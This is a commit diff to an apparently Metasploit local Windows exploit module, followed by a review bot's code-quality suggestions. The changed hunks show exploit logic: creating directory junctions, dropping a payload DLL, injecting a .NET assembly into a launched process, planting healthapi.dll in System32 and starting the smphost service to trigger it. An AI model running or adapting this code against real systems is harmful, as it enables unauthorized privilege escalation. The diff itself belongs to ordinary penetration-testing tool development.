Fix up code to use the built-in cd() and mkdir() commands, and adjust the code so it does not overwrite the datastore hash. Also use service_hash over manually starting the service.
This commit is contained in:
parent
3e52debd8b
commit
d5bb36c530
@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
include Msf::Post::Windows::Dotnet
|
||||
include Msf::Post::Windows::Services
|
||||
include Msf::Exploit::FileDropper
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
@ -157,7 +158,8 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
intermediate_dir = rand_text_alpha(10).to_s
|
||||
junction_dir = rand_text_alpha(10).to_s
|
||||
|
||||
cmd_exec("cmd.exe /C \"cd #{dir_junct_path} && mkdir #{intermediate_dir}\"")
|
||||
cd(dir_junct_path)
|
||||
mkdir(intermediate_dir)
|
||||
if !directory?("#{dir_junct_path}\\#{intermediate_dir}")
|
||||
fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
|
||||
end
|
||||
@ -185,10 +187,9 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
|
||||
print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
|
||||
write_file(payload_path, generate_payload_dll)
|
||||
datastore['ARGUMENTS'] = "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}"
|
||||
register_file_for_cleanup(payload_path)
|
||||
execute_assembly(exe_path)
|
||||
cmd_exec('net start smphost')
|
||||
execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
|
||||
service_start('smphost')
|
||||
register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
|
||||
end
|
||||
|
||||
@ -237,7 +238,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
[exploit_mem, offset]
|
||||
end
|
||||
|
||||
def execute_assembly(exe_path)
|
||||
def execute_assembly(exe_path, exe_args)
|
||||
if sysinfo.nil?
|
||||
fail_with(Failure::BadConfig, 'Session invalid')
|
||||
else
|
||||
@ -250,14 +251,13 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
process, hprocess = launch_process
|
||||
exploit_mem, offset = inject_hostclr_dll(hprocess)
|
||||
|
||||
assembly_mem = copy_assembly(exe_path, hprocess)
|
||||
assembly_mem = copy_assembly(exe_path, hprocess, exe_args)
|
||||
|
||||
print_status('Executing...')
|
||||
hprocess.thread.create(exploit_mem + offset, assembly_mem)
|
||||
|
||||
sleep(datastore['WAIT']) if datastore['WAIT'].positive?
|
||||
|
||||
if datastore['WAIT'].positive?
|
||||
sleep(datastore['WAIT'])
|
||||
read_output(process)
|
||||
end
|
||||
|
||||
@ -269,7 +269,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
print_good('Execution finished.')
|
||||
end
|
||||
|
||||
def copy_assembly(exe_path, process)
|
||||
def copy_assembly(exe_path, process, exe_args)
|
||||
print_status("Host injected. Copy assembly into #{process.pid}...")
|
||||
int_param_size = 8
|
||||
sign_flag_size = 1
|
||||
@ -278,7 +278,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
assembly_size = File.size(exe_path)
|
||||
|
||||
cln_params = ''
|
||||
cln_params << datastore['ARGUMENTS']
|
||||
cln_params << exe_args
|
||||
cln_params << "\x00"
|
||||
|
||||
payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size
|
||||
|
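Review bot: The status returned by `service_start('smphost')` is discarded, so a failed or already-running start is never reported and the module proceeds to `register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')` on the next line as if the service had started. I would capture it and fail on anything but the mixin's success value, e.g. `status = service_start('smphost')` followed by `fail_with(Failure::UnexpectedReply, "Failed to start the smphost service: #{status}") unless status == 0` (confirm the success code against Msf::Post::Windows::Services, which this hunk does not show). The same unchecked-result pattern appears with `cd(dir_junct_path)` in the first code hunk: its result is ignored and it changes the session's working directory for the rest of the run, whereas `mkdir("#{dir_junct_path}\\#{intermediate_dir}")` with the full path would avoid both the side effect and the dependence on the cd succeeding (the existing `directory?` check would still validate the result). The new `exe_args` parameter on `execute_assembly` and `copy_assembly` is undocumented; a `# @param exe_args [String] command line passed to the assembly; appended verbatim and NUL-terminated in copy_assembly` line above each definition would make the contract explicit, and `cln_params << exe_args` would raise on a nil argument, so either defaulting `exe_args` to `''` or appending `exe_args.to_s` is worth considering. The exploit method containing the service_start call begins before its hunk.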